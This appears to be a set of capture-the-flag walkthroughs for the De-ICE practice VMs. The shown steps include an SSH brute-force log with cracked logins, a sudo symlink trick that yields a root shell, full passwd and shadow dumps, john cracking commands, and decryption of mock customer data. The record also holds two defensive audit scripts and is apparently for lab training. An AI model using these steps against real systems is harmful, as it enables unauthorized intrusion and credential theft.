[+] 192.168.1.120:22 SSH - Success: 'rpatel:1234567' 'uid=1045(rpatel) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 40 opened (192.168.1.130:34844 -> 192.168.1.120:22) at 2015-01-08 12:31:03 -0700
[+] 192.168.1.120:22 SSH - Success: 'sgains:computer' 'uid=1019(sgains) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 41 opened (192.168.1.130:54407 -> 192.168.1.120:22) at 2015-01-08 12:31:06 -0700
[+] 192.168.1.120:22 SSH - Success: 'sjohnson:12345678' 'uid=1046(sjohnson) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 42 opened (192.168.1.130:40759 -> 192.168.1.120:22) at 2015-01-08 12:31:09 -0700
[+] 192.168.1.120:22 SSH - Success: 'strammel:monkey' 'uid=1006(strammel) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 43 opened (192.168.1.130:55731 -> 192.168.1.120:22) at 2015-01-08 12:31:12 -0700
[+] 192.168.1.120:22 SSH - Success: 'swarren:Password' 'uid=1007(swarren) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 44 opened (192.168.1.130:52038 -> 192.168.1.120:22) at 2015-01-08 12:31:16 -0700
[+] 192.168.1.120:22 SSH - Success: 'tdeleon:soccer' 'uid=1038(tdeleon) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 45 opened (192.168.1.130:48251 -> 192.168.1.120:22) at 2015-01-08 12:31:19 -0700
[+] 192.168.1.120:22 SSH - Success: 'tgoodchap:nintendo' 'uid=1030(tgoodchap) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 46 opened (192.168.1.130:36430 -> 192.168.1.120:22) at 2015-01-08 12:31:22 -0700
[-] 192.168.1.120:22 SSH - Failed: ':'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

I haven’t cracked root yet, but notice this: “‘ccoffee:0’ ‘uid=1044(ccoffee) gid=100(users) groups=100(users),102(admin)’”. The 102 (admin) group ID is promising.

Linux 2.6.27.27.
ccoffee@slax:~$ ls
DONOTFORGET*  scripts/
ccoffee@slax:~$ cat DONOTFORGET 
remember your 20th anniversary on the 5th!!!!!!!!!1111!!
ccoffee@slax:~$ cd scripts/
ccoffee@slax:~/scripts$ ls
getlogs.sh*
ccoffee@slax:~/scripts$ cat getlogs.sh 
cat: getlogs.sh: Permission denied
ccoffee@slax:~/scripts$

Permission denied!

ccoffee@slax:~$ mv scripts/ scripts.old
ccoffee@slax:~$ mkdir scripts     
ccoffee@slax:~$ ln -s /bin/sh scripts/getlogs.sh
ccoffee@slax:~$ ls -l scripts/getlogs.sh 
lrwxrwxrwx 1 ccoffee users 7 Jan  7 23:03 scripts/getlogs.sh -> /bin/sh*
ccoffee@slax:~$ sudo scripts/getlogs.sh

What this did was rename the scripts directory, which I didn’t have permission to read into, to scripts.old, then create a fresh scripts directory whose getlogs.sh is a symlink to /bin/sh. sudo only checks the path in its rule, not who owns the file at that path, so running sudo scripts/getlogs.sh spawns a root shell.
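The check a defender would run for this class of mistake, as an added example that is not part of the original post or the De-ICE image: it parses sudoers-style rules and flags any command path that the granted user could rename or replace, which is exactly why sudo scripts/getlogs.sh handed out a root shell. The sudoers lines, the mock directory tree and the uid mapping are constructed for the demo.

```python
"""Audit sudo rules for command paths that the granted user could replace.

Added example for this walkthrough, not code from the De-ICE image or the
post. sudo checks the rule's path, not who owns the file at it, so a user who
can write any directory on the way to that path can rename it and plant a
symlink. Mode bits only (no ACLs, no root bypass); the demo data is constructed.
"""
import os
import re
import shutil
import stat
import tempfile
from collections import namedtuple

Finding = namedtuple("Finding", "user command component reason")

# user host = (runas) [TAG:] cmd[, cmd ...]; Defaults, aliases and includes are skipped
_RULE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$")
_TAG = re.compile(
    r"^(?:NO)?(?:PASSWD|EXEC|SETENV|LOG_INPUT|LOG_OUTPUT|MAIL|FOLLOW|INTERCEPT)\s*:\s*", re.I)
_SKIP = ("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias", "@include")
# directories the demo marks read-only, standing in for root-owned system paths
_DEMO_RO_DIRS = ("home", "usr", "usr/local", "usr/local/bin")


def parse_sudoers(text):
    """Return (user, command) pairs for every plain user rule in `text`."""
    pairs = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(_SKIP):
            continue
        m = _RULE.match(line)
        if not m:
            continue
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            while _TAG.match(cmd):  # peel NOPASSWD:, NOEXEC:, ... prefixes
                cmd = _TAG.sub("", cmd, count=1)
            if cmd:
                pairs.append((m.group("user"), cmd.split()[0]))
    return pairs


def writable_by(path, uid, gids):
    """True if the mode bits of `path` let `uid` (member of `gids`) write it."""
    st = os.stat(path)
    if st.st_uid == uid:
        return bool(st.st_mode & stat.S_IWUSR)
    if st.st_gid in gids:
        return bool(st.st_mode & stat.S_IWGRP)
    return bool(st.st_mode & stat.S_IWOTH)


def audit(sudoers_text, ids, fs_root="/"):
    """Findings for rules whose command path the user could swap out.
    ids maps user -> (uid, set_of_gids); fs_root may point at a copied tree."""
    fs_root = os.path.normpath(fs_root)
    findings = []
    for user, cmd in parse_sudoers(sudoers_text):
        if user not in ids or not cmd.startswith("/"):
            continue  # %group/alias rules and the ALL keyword are out of scope here
        uid, gids = ids[user]
        p = os.path.normpath(os.path.join(fs_root, cmd.lstrip("/")))
        while p != fs_root:  # the command file first, then each ancestor directory
            rel = "/" + os.path.relpath(p, fs_root)
            if os.path.islink(p):
                findings.append(Finding(user, cmd, rel, "symlink"))
            elif os.path.exists(p) and writable_by(p, uid, gids):
                # a missing component is skipped; its first writable ancestor is flagged
                findings.append(Finding(user, cmd, rel, "writable"))
            p = os.path.dirname(p)
    return findings


# Constructed sudoers, modelled on the rule the walkthrough's sudo call implies.
DEMO_SUDOERS = """
Defaults env_reset
ccoffee ALL=(root) NOPASSWD: /home/ccoffee/scripts/getlogs.sh  # lives in the user's home
aadams  ALL=(root) /usr/local/bin/getlogs.sh                   # same script, system location
root    ALL=(ALL) ALL
"""


def build_demo_tree(root):
    """Mock filesystem under `root`: /home/ccoffee is writable by its owner
    (as on the real box); /home and /usr/local/bin are not."""
    for d in ("home/ccoffee/scripts", "usr/local/bin"):
        os.makedirs(os.path.join(root, d), exist_ok=True)
    for f in ("home/ccoffee/scripts/getlogs.sh", "usr/local/bin/getlogs.sh"):
        open(os.path.join(root, f), "w").close()
        os.chmod(os.path.join(root, f), 0o500)  # executable, not writable
    for d in ("home/ccoffee", "home/ccoffee/scripts"):
        os.chmod(os.path.join(root, d), 0o755)
    for d in _DEMO_RO_DIRS:
        os.chmod(os.path.join(root, d), 0o555)
    return root


def remove_demo_tree(root):
    for d in _DEMO_RO_DIRS:
        os.chmod(os.path.join(root, d), 0o755)  # make rmtree possible again
    shutil.rmtree(root)


if __name__ == "__main__":
    root = build_demo_tree(tempfile.mkdtemp())
    me = (os.getuid(), {os.getgid()})
    print(audit(DEMO_SUDOERS, {"ccoffee": me, "aadams": me}, fs_root=root))
    remove_demo_tree(root)
```

Against the mock tree the aadams rule is clean, while the ccoffee rule is flagged twice: both /home/ccoffee/scripts and /home/ccoffee are writable by the rule's own user.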

There is no specific challenge so once you are on the system look around and be awesome.

root@slax:/etc# cat passwd      
root:x:0:0::/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:daemon:/sbin:/bin/false
adm:x:3:4:adm:/var/log:/bin/false
lp:x:4:7:lp:/var/spool/lpd:/bin/false
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/:/bin/false
news:x:9:13:news:/usr/lib/news:/bin/false
uucp:x:10:14:uucp:/var/spool/uucppublic:/bin/false
operator:x:11:0:operator:/root:/bin/bash
games:x:12:100:games:/usr/games:/bin/false
ftp:x:14:50::/home/ftp:/bin/false
smmsp:x:25:25:smmsp:/var/spool/clientmqueue:/bin/false
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/false
rpc:x:32:32:RPC portmap user:/:/bin/false
sshd:x:33:33:sshd:/:/bin/false
gdm:x:42:42:GDM:/var/state/gdm:/bin/bash
apache:x:80:80:User for Apache:/srv/httpd:/bin/false
messagebus:x:81:81:User for D-BUS:/var/run/dbus:/bin/false
haldaemon:x:82:82:User for HAL:/var/run/hald:/bin/false
pop:x:90:90:POP:/:/bin/false
nobody:x:99:99:nobody:/:/bin/false
aard:x:1000:100:Aaron Ard:/home/aard:
qpowers:x:1001:100:Quinton Powers:/home/qpowers:
jbresnahan:x:1002:100:Jay Bresnahan:/home/jbresnahan:
aadams:x:1003:100:Adam Adams:/home/aadams:
jdavenport:x:1004:100:James Davenport:/home/jdavenport:
ktso:x:1005:100:Kristen Tso:/home/ktso:
strammel:x:1006:100:Stephanie Trammel:/home/strammel:
swarren:x:1007:100:Samuel Warren:/home/swarren:
myajima:x:1008:100:Moto Yajima:/home/myajima:
kclemons:x:1009:100:Kathryn Clemons:/home/kclemons:
rdominguez:x:1010:100:Rafael Dominguez:/home/rdominguez:
djohnson:x:1011:100:Daniel Johnson:/home/djohnson:
bbanter:x:1012:100:Bob Banter:/home/bbanter:
jalvarez:x:1013:100:Joy Alvarez:/home/jalvarez:
dgilfillan:x:1014:100:Darcy Gilfillan:/home/dgilfillan:
dgrant:x:1015:100:Daniel Grant:/home/dgrant:
kwebber:x:1016:100:Kathleen Webber:/home/kwebber:
aheflin:x:1017:100:Anna Heflin:/home/aheflin:
amaynard:x:1018:100:Arthur Maynard:/home/amaynard:
sgains:x:1019:100:Susan Gains:/home/sgains:
jduff:x:1020:100:Jerry Duff:/home/jduff:
hlovell:x:1021:100:Henrietta Lovell:/home/hlovell:
cchisholm:x:1022:100:Cindy Chisholm:/home/cchisholm:
dstevens:x:1023:100:Donald Stevens:/home/dstevens:
bphillips:x:1024:100:Brad Phillips:/home/bphillips:
dwestling:x:1025:100:David Westling:/home/dwestling:
mrodriguez:x:1026:100:Manuel Rodriguez:/home/mrodriguez:
jfranklin:x:1027:100:Johnny Franklin:/home/jfranklin:
lmorales:x:1028:100:Lindsey Morales:/home/lmorales:
jayala:x:1029:100:John Ayala:/home/jayala:
tgoodchap:x:1030:100:Taj Goodchap:/home/tgoodchap:
aallen:x:1031:100:Aaron Allen:/home/aallen:
aweiland:x:1032:100:Adam Weiland:/home/aweiland:
dtraylor:x:1033:100:Donnie Traylor:/home/dtraylor:
lmartinez:x:1034:100:Luis Martinez:/home/lmartinez:
aspears:x:1035:100:Adam Spears:/home/aspears:
dcooper:x:1036:100:Donald Cooper:/home/dcooper:
bwatkins:x:1037:100:Brandon Watkins:/home/bwatkins:
tdeleon:x:1038:100:Terrence Deleon:/home/tdeleon:
aharp:x:1039:100:Annie Harp:/home/aharp:
jalcantar:x:1040:100:Jesse Alcantar:/home/jalcantar:
mholland:x:1041:100:Marian Holland:/home/mholland:
mbryan:x:1042:100:Michael Bryan:/home/mbryan:
rjacobson:x:1043:100:Randy Jacobson:/home/rjacobson:
ccoffee:x:1044:100:Chad Coffee:/home/ccoffee:
rpatel:x:1045:100:Randall Patel:/home/rpatel:
sjohnson:x:1046:100:Steven Johnson:/home/sjohnson:
mnader:x:1047:100:Muhammad Nader:/home/mnader:
krenfro:x:1048:100:Kimberly Renfro:/home/krenfro:

root@slax:/etc# cat shadow
root:$1$6Hl/leIf$BHG4Z0HgNq2bnbRriQcCt/:16442:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
apache:*:9797:0:::::
messagebus:*:9797:0:::::
haldaemon:*:9797:0:::::
nobody:*:9797:0:::::
aard:$1$M/1naIfI$/dpCFIuWISrIGy408fP0U.:16442:0:99999:7:::
qpowers:$1$oDCsaIfI$PlHnGw5Ylqoke4HOfDnz81:16442:0:99999:7:::
jbresnahan:$1$nHExaIfI$xFPgXAOo9ktw2azn/qnbv.:16442:0:99999:7:::
aadams:$1$TzF0bIfI$RvB2GZOb5WDCJX.agChuB1:16442:0:99999:7:::
jdavenport:$1$3wl/neIf$kuBSySXsu5nSeNjMgBRjr1:16442:0:99999:7:::
ktso:$1$t0KAbIfI$WPULPwgsjByt0ICV6.zMS1:16442:0:99999:7:::
strammel:$1$lpLFbIfI$B9wU7zrHALtgO5PpTFEYJ1:16442:0:99999:7:::
swarren:$1$TdNKbIfI$Duy.Uy2sGwqY6YsfTzX4h1:16442:0:99999:7:::
myajima:$1$xJPPbIfI$SQc4btSCHeIIYPVE/.r6a.:16442:0:99999:7:::
kclemons:$1$IURUbIfI$Tpisuh39vd16hd9Q2W198/:16442:0:99999:7:::
rdominguez:$1$PDTZbIfI$xKK6A/ZQiFgWpYVzzd.Gw.:16442:0:99999:7:::
djohnson:$1$buUebIfI$0gd4dWKyVH2.ufk8zSq.z0:16442:0:99999:7:::
bbanter:$1$QWWjbIfI$GoRunRTIFvf9sOfrWttwS0:16442:0:99999:7:::
jalvarez:$1$AHYobIfI$gqSV2utxp46bVc0MzOFCP.:16442:0:99999:7:::
dgilfillan:$1$m0atbIfI$r5vprBT7DmEx/bNqH8RDM1:16442:0:99999:7:::
dgrant:$1$7sbybIfI$8FbpRfuY.N8hX6Sn4A4PX.:16442:0:99999:7:::
kwebber:$1$9hd1cIfI$Hsx2f74tHtVhioZegod8d.:16442:0:99999:7:::
aheflin:$1$waf6cIfI$Yq12oAcx/c176h1LC/MHJ.:16442:0:99999:7:::
amaynard:$1$nFhBcIfI$Q7LRuK3aMzhrdqZD1AjaF0:16442:0:99999:7:::
sgains:$1$U3jGcIfI$pbF6mepdppQgEM1/OnOKS1:16442:0:99999:7:::
jduff:$1$bskLcIfI$0xxI8JWghNZrwknfckK4I1:16442:0:99999:7:::
hlovell:$1$0bmQcIfI$f7yj5xtUFVmGnMtEc0F0M/:16442:0:99999:7:::
cchisholm:$1$2PoVcIfI$g2OHLIwZNfkSEwbkdXL.o/:16442:0:99999:7:::
dstevens:$1$/MqacIfI$YrH3QJethu7PXmEB5cDvB.:16442:0:99999:7:::
bphillips:$1$3BsfcIfI$AnYSJSkRMC5yvbTQIdHPN1:16442:0:99999:7:::
dwestling:$1$nvtkcIfI$WOkUDONlGepzNXM37hzDW1:16442:0:99999:7:::
mrodriguez:$1$LkvpcIfI$UYw1kRIkon2T3Kf/as.hD.:16442:0:99999:7:::
jfranklin:$1$8XxucIfI$5V78VV1YZVUaq2PyRbH82/:16442:0:99999:7:::
lmorales:$1$NOzzcIfI$xHUTPP/Myrqh8iBIF4sH00:16442:0:99999:7:::
jayala:$1$r5//2dIf$WGWmk2GfQETfIqPvnu5Eb.:16442:0:99999:7:::
tgoodchap:$1$Yo0/7dIf$jfLG8/Fv7873kFlascMdg1:16442:0:99999:7:::
aallen:$1$Zm2/CdIf$tonJrOosRTYbCzxTYcBrJ.:16442:0:99999:7:::
aweiland:$1$Jc4/HdIf$Iae3U0Lbu04YjxfO3t8f2/:16442:0:99999:7:::
dtraylor:$1$db6/MdIf$5Wtmc3YxBJkLE3TjSqwX91:16442:0:99999:7:::
lmartinez:$1$DH8/RdIf$vosY88nHAoqwPonN.tMBO1:16442:0:99999:7:::
aspears:$1$.5A/WdIf$lt4KE9Mt01qjJwH0q/TaA.:16442:0:99999:7:::
dcooper:$1$2pB/bdIf$9Bqi7D3JH7nO3YVuiKhfq.:16442:0:99999:7:::
bwatkins:$1$biD/gdIf$PqXD41GXwTEtNnNSNP7ve1:16442:0:99999:7:::
tdeleon:$1$VdF/ldIf$8VVkJorueLDB2XEdwRcvA/:16442:0:99999:7:::
aharp:$1$GjH/qdIf$SXBGXRgsaGwWst2EVA4OK.:16442:0:99999:7:::
jalcantar:$1$dXJ/vdIf$1kaaAoMN7832vQ.0h8idE1:16442:0:99999:7:::
mholland:$1$HZL/.eIf$y0VAQHlJuHxJ09uHYYXYV1:16442:0:99999:7:::
mbryan:$1$/kN/3eIf$b6lCYJUAEVi89QU501i/J.:16442:0:99999:7:::
rjacobson:$1$WuP/8eIf$mbawyIozTk2s4rMW6.ruA/:16442:0:99999:7:::
ccoffee:$1$8.S/DeIf$1FJ.To3iEN0LVosO0Xtzg/:16442:0:99999:7:::
rpatel:$1$c8U/IeIf$g91rGG1w6ulFOgRto6R.D/:16442:0:99999:7:::
sjohnson:$1$zoW/NeIf$I6x4GbMkhjKDps9B56Yrm0:16442:0:99999:7:::
mnader:$1$u5Z/SeIf$9qy9RwXoat1fLfbQMjvri.:16442:0:99999:7:::
krenfro:$1$Hwb/XeIf$626PVcnIxjUS6zrwWz40P.:16442:0:99999:7:::

unshadow 120passwd 120shadow > 120unshadow
john -rules -wordlist=/usr/share/wordlists/rockyou.txt 120unshadow
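As an added example (not from the post or the De-ICE image), the audit a defender would run on those same two files before anyone gets to the unshadow step: it flags the MD5-crypt ($1$) hashes, accounts with no password expiry, empty login shells, and the operator account with gid 0 and bash that appear in the dump above. The sample entries are constructed and the hash fields are placeholders with realistic prefixes only.

```python
"""Audit /etc/passwd and /etc/shadow for the weaknesses unshadow + john feeds on.

Added example for this walkthrough, not code from the De-ICE image or the post.
Flags: fast-to-crack hash schemes (MD5-crypt, DES-crypt), empty passwords,
passwords that never expire, empty shells (login falls back to /bin/sh),
non-root accounts with uid or gid 0, and system accounts with an interactive
shell. SAMPLE_PASSWD / SAMPLE_SHADOW are constructed; hashes are placeholders.
"""

NOLOGIN_SHELLS = {"/bin/false", "/sbin/nologin", "/usr/sbin/nologin",
                  "/bin/sync", "/sbin/shutdown", "/sbin/halt"}
WEAK_SCHEMES = {"descrypt", "md5crypt", "unknown"}


def parse_passwd(text):
    """name -> dict(uid, gid, home, shell) from /etc/passwd content (7 fields)."""
    accounts = {}
    for line in text.splitlines():
        f = line.split(":")
        if len(f) != 7 or not f[0]:
            continue  # blank or malformed line
        accounts[f[0]] = {"uid": int(f[2]), "gid": int(f[3]), "home": f[5], "shell": f[6]}
    return accounts


def parse_shadow(text):
    """name -> dict(hash, max_days) from /etc/shadow content (9 fields)."""
    entries = {}
    for line in text.splitlines():
        f = line.split(":")
        if len(f) != 9 or not f[0]:
            continue
        entries[f[0]] = {"hash": f[1], "max_days": f[4]}
    return entries


def hash_scheme(h):
    """Classify a crypt(3) hash field by its prefix."""
    if h == "":
        return "empty"
    if h[0] in "*!":
        return "locked"
    for prefix, name in (("$1$", "md5crypt"), ("$5$", "sha256crypt"),
                         ("$6$", "sha512crypt"), ("$y$", "yescrypt"),
                         ("$7$", "yescrypt"), ("$2", "bcrypt")):
        if h.startswith(prefix):
            return name
    return "descrypt" if len(h) == 13 else "unknown"


def audit_accounts(passwd_text, shadow_text):
    """Return (user, issue) pairs; issue strings are stable identifiers."""
    findings = []
    shadow = parse_shadow(shadow_text)
    for name, a in parse_passwd(passwd_text).items():
        if name != "root":
            if a["uid"] == 0:
                findings.append((name, "uid-0"))
            if a["gid"] == 0:
                findings.append((name, "gid-0"))
        interactive = a["shell"] not in NOLOGIN_SHELLS  # "" means /bin/sh at login
        if a["shell"] == "":
            findings.append((name, "empty-shell"))
        if a["uid"] < 1000 and name != "root" and interactive:
            findings.append((name, "system-uid-interactive-shell"))
        s = shadow.get(name)
        if s is None:
            findings.append((name, "no-shadow-entry"))
            continue
        scheme = hash_scheme(s["hash"])
        if scheme == "empty":
            findings.append((name, "empty-password"))
        elif scheme in WEAK_SCHEMES:
            findings.append((name, "weak-hash:" + scheme))
        if scheme not in ("empty", "locked") and s["max_days"] in ("", "99999"):
            findings.append((name, "no-expiry"))
    return findings


# Constructed sample in the layout of the files dumped above; hashes are placeholders.
SAMPLE_PASSWD = """\
root:x:0:0::/root:/bin/bash
operator:x:11:0:operator:/root:/bin/bash
sshd:x:33:33:sshd:/:/bin/false
aadams:x:1003:100:Adam Adams:/home/aadams:
ccoffee:x:1044:100:Chad Coffee:/home/ccoffee:/bin/bash
"""
SAMPLE_SHADOW = """\
root:$1$placehld$PLACEHOLDERPLACEHOLDER.:16442:0:::::
operator:*:9797:0:::::
sshd:*:9797:0:::::
aadams:$1$placehld$PLACEHOLDERPLACEHOLDER/:16442:0:99999:7:::
ccoffee:$6$placeholdersalt$PLACEHOLDERPLACEHOLDERPLACEHOLDERPLACEHOLDER:16442:0:90:7:::
"""

if __name__ == "__main__":
    for user, issue in audit_accounts(SAMPLE_PASSWD, SAMPLE_SHADOW):
        print(f"{user}: {issue}")
```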

While digging though an old external drive I found the De-ICE LiveCD’s and walkthrough text files I had put together a few years ago. They are really simple; each one is a link to download the ISO, some non-spoiler information to get started, and spoilers on the off chance that you get stuck on some part of the challenge.

Personally, I learned a lot about post exploitation from some of the challenges in De-ICE. All of the spoilers are in the walkthrough as not to ruin the pen testing fun. Have fun and hopefully these are helpful.

SE-ICE S1.110

Scenario: The scenario for this LiveCD is that a CEO of a small company has tasked you to do more extensive penetration testing of systems within his company. The network administrator has reconfigured systems within his network to meet tougher security requirements and expects you to fail any further penetration attempts. This system is an FTP server used by the network administrator team to create/reload systems on the company intranet. No classified or sensitive information should reside on this server. Through discussion with the administrator, you found out that this server had been used in the past to maintain customer information, but has been sanitized (as opposed to re-built). Prove to the network administrator that proper system configuration is not the only thing critical in securing a server.

Download Link: http://hackingdojo.com/downloads/iso/De-ICE_S1.110.iso

Default IP 192.168.1.110

Flags:
1. create list of open ports
2. create list of users for brute force
3. brute force password for one or more users on an open service
4. Log in using brute force password
5. Perform post exploitation
6. FINAL FLAG: obtain customer credit card information

 

Spoilers and Walkthrough

Change IP – Depending on your configuration you may not need to do this. Log in as root, password is at bottom of page. This assumes that you are using VMWare NAT and XX is the third octet of range you are using.

   ifconfig eth0 192.168.XX.110/24
   route add default gw 192.168.XX.2

Port Scan the System –

   nmap -sV -T4 -O -oX /root/Desktop/deice110 192.168.42.110

Hitting it with a version scan to determine what is running. We are going to output the file as XML and practice using the Metasploit database. You can run it all from inside msfconsole using the db_nmap command with the normal nmap switches, but I'm showing you the import function.

   msfconsole
   workspace -a deice
   workspace deice

This creates a database named deice and sets it as the current working

   db_import /root/Desktop/deice110
   hosts

You should see the 110 address. WooHoo!

   services

There should be four ports open. Go check out the website because it has info you need.
adamsa@herot.net
banterb@herot.net
coffeec@herot.net

I love me some FTP, I really love anonymous FTP

   use auxiliary/scanner/ftp/anonymous

Use either the command line or FileZilla to get access to FTP.
I used filezilla and downloaded everything.
The download/etc/shadow seems promising
John can work with the shadow file without unshadowing it.

Running john against it:

   john -rules -wordlist=/usr/share/wordlists/rockyou.txt shadow

john returned a password but it didn’t work.

There is a passwd file in download/opt/cygwin/etc but no shadow file, so moving along.
What is the core file in download/etc?

   file core
   core: ELF 32-bit LSB core file Intel 80386....

Better Google that; it is a Linux core dump file. Go read up on that, we'll wait.

   strings core

The end looks like a dump of a shadow file

   strings core > /root/desktop/deice/coredump

This gives us a working copy on the desktop. I copied out the info and split it at the usernames. If you look at the shadow file from the 100 disk for the normal format; second verse, same as the first.

   john -rules -wordlist=/usr/share/wordlists/rockyou.txt coreshadow

This gives us passwords for the following users: root, bbanter. SSH to the system and get root.

   ssh to the box as bbanter
   ssh bbanter@192.168.42.110
   su -

From the 100 disk we know that .enc files are encrypted and we are looking for credit card data so why not try to find that again.

   cd /
   find -iname '*.enc'

That pukes back a lot of things but look at:

   /home/root/.save/customer_account.csv.enc

Jump back to the openssl decrypt if you need help:

   openssl list-cipher-commands
   openssl enc -aes-128-cbc -d -in /home/root/.save/customer_account.csv.enc -out customer_account.csv

WAIT NO JOY!
Let's go look at the /home/root/.save folder.

   cd /home/root/.save
   ls

Look at the copy.sh script

   cat copy.sh

This is the script that encrypted the file; the password is in the “file” section. Let's decrypt it now:

   openssl enc -d -aes-256-cbc -in customer_account.csv.enc -out customer_account.csv -pass file:/etc/ssl/certs/pw
   cat customer_account.csv

BOOM you’re done. Openssl is a pain but now you’re a pro.

Account Information

root:Complexity
bbanter:Zymurgy

While digging though an old external drive I found the De-ICE LiveCD’s and walkthrough text files I had put together a few years ago. They are really simple; each one is a link to download the ISO, some non-spoiler information to get started, and spoilers on the off chance that you get stuck on some part of the challenge.

Personally, I learned a lot about post exploitation from some of the challenges in De-ICE. All of the spoilers are in the walkthrough so as not to ruin the pen testing fun. The De-ICE S1.100 was the first capture the flag type challenge that I ever did. I think I got it from a 2600 Magazine, so it holds a special place in my heart. I would have actually done this initially using BackTrack or PHLAK; PHLAK still has the best Tux logo of any distro, RIP PHLAK. I lost my original notes so this one is brand new, instead of a few years old like the other versions will be. Have fun and hopefully these are helpful.

De-ICE S1.100

Scenario: The scenario for this LiveCD is that a CEO of a small company has been pressured by the Board of Directors to have a penetration test done within the company. The CEO, believing his company is secure, feels this is a huge waste of money, especially since he already has a company scan their network for vulnerabilities. To make the BoD happy, he decides to hire you for a 5-day job; and because he really doesn't believe the company is insecure, he has contracted you to look at only one server, an old system that only has a web-based list of the company's contact information. The CEO expects you to prove that the admins of the box follow all proper accepted security practices, and that you will not be able to obtain access to the box. Prove to him that a full penetration test of their entire corporation would be the best way to ensure his company is actually following best security practices.

Download Link: http://hackingdojo.com/downloads/iso/De-ICE_S1.100.iso

Default IP 192.168.1.100

Flags:
1. Create list of open ports
2. Create a list of possible user names
3. Gain access to the file system
4. Elevate to root privileges
5. Discover root password
6. Find sensitive data on the operating system

Spoilers and Walkthrough

I usually start all assessments out with a port scan. This gives me at least an idea of where to start on a black box test. Since I am running this in a local VMware environment speed isn't an issue, so -T5 it is. I also want to do OS detection and service enumeration, so I'm using -A.

nmap -A -p 0-65535 -T5 192.168.1.100
Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-05 20:59 EDT
Nmap scan report for caps-dh841pm1(192.168.1.100)
Host is up (0.00025s latency).
Not shown: 65528 filtered ports
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd (broken: could not bind listening IPv4 socket)
22/tcp open ssh OpenSSH 4.3 (protocol 1.99)
| ssh-hostkey: 
| 2048 83:4f:8b:e9:ea:84:20:0d:3d:11:2b:f0:90:ca:79:1c (RSA1)
| 2048 6f:db:a5:12:68:cd:ad:a9:9c:cd:1e:7b:97:1a:4c:9f (DSA)
|_ 2048 ab:ab:a8:ad:a2:f2:fd:c2:6f:05:99:69:40:54:ec:10 (RSA)
|_sshv1: Server supports SSHv1
25/tcp open smtp Sendmail 8.13.7/8.13.7
| smtp-commands: slax.example.net Hello [192.168.1.128], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, 8BITMIME, SIZE, DSN, ETRN, AUTH DIGEST-MD5 CRAM-MD5, DELIVERBY, HELP, 
|_ 2.0.0 This is sendmail version 8.13.7 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation see 2.0.0 http://www.sendmail.org/email-addresses.html 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info 
80/tcp open http Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
|_http-server-header: Apache/2.0.55 (Unix) PHP/5.1.2
|_http-title: Site doesn't have a title (text/html).
110/tcp open pop3 Openwall popa3d
143/tcp open imap UW imapd 2004.357
|_imap-capabilities: UNSELECT LOGIN-REFERRALS MAILBOX-REFERRALS LITERAL+ THREAD=REFERENCES NAMESPACE completed IDLE SASL-IR CAPABILITY OK AUTH=LOGINA0001 BINARY IMAP4REV1 STARTTLS MULTIAPPEND SCAN THREAD=ORDEREDSUBJECT SORT
443/tcp closed https
MAC Address: 00:0C:29:1F:C6:F0 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.13 - 2.6.32
Network Distance: 1 hop
Service Info: Hosts: slax.example.net, isr-l2g99xz1; OS: Unix

TRACEROUTE
HOP RTT ADDRESS
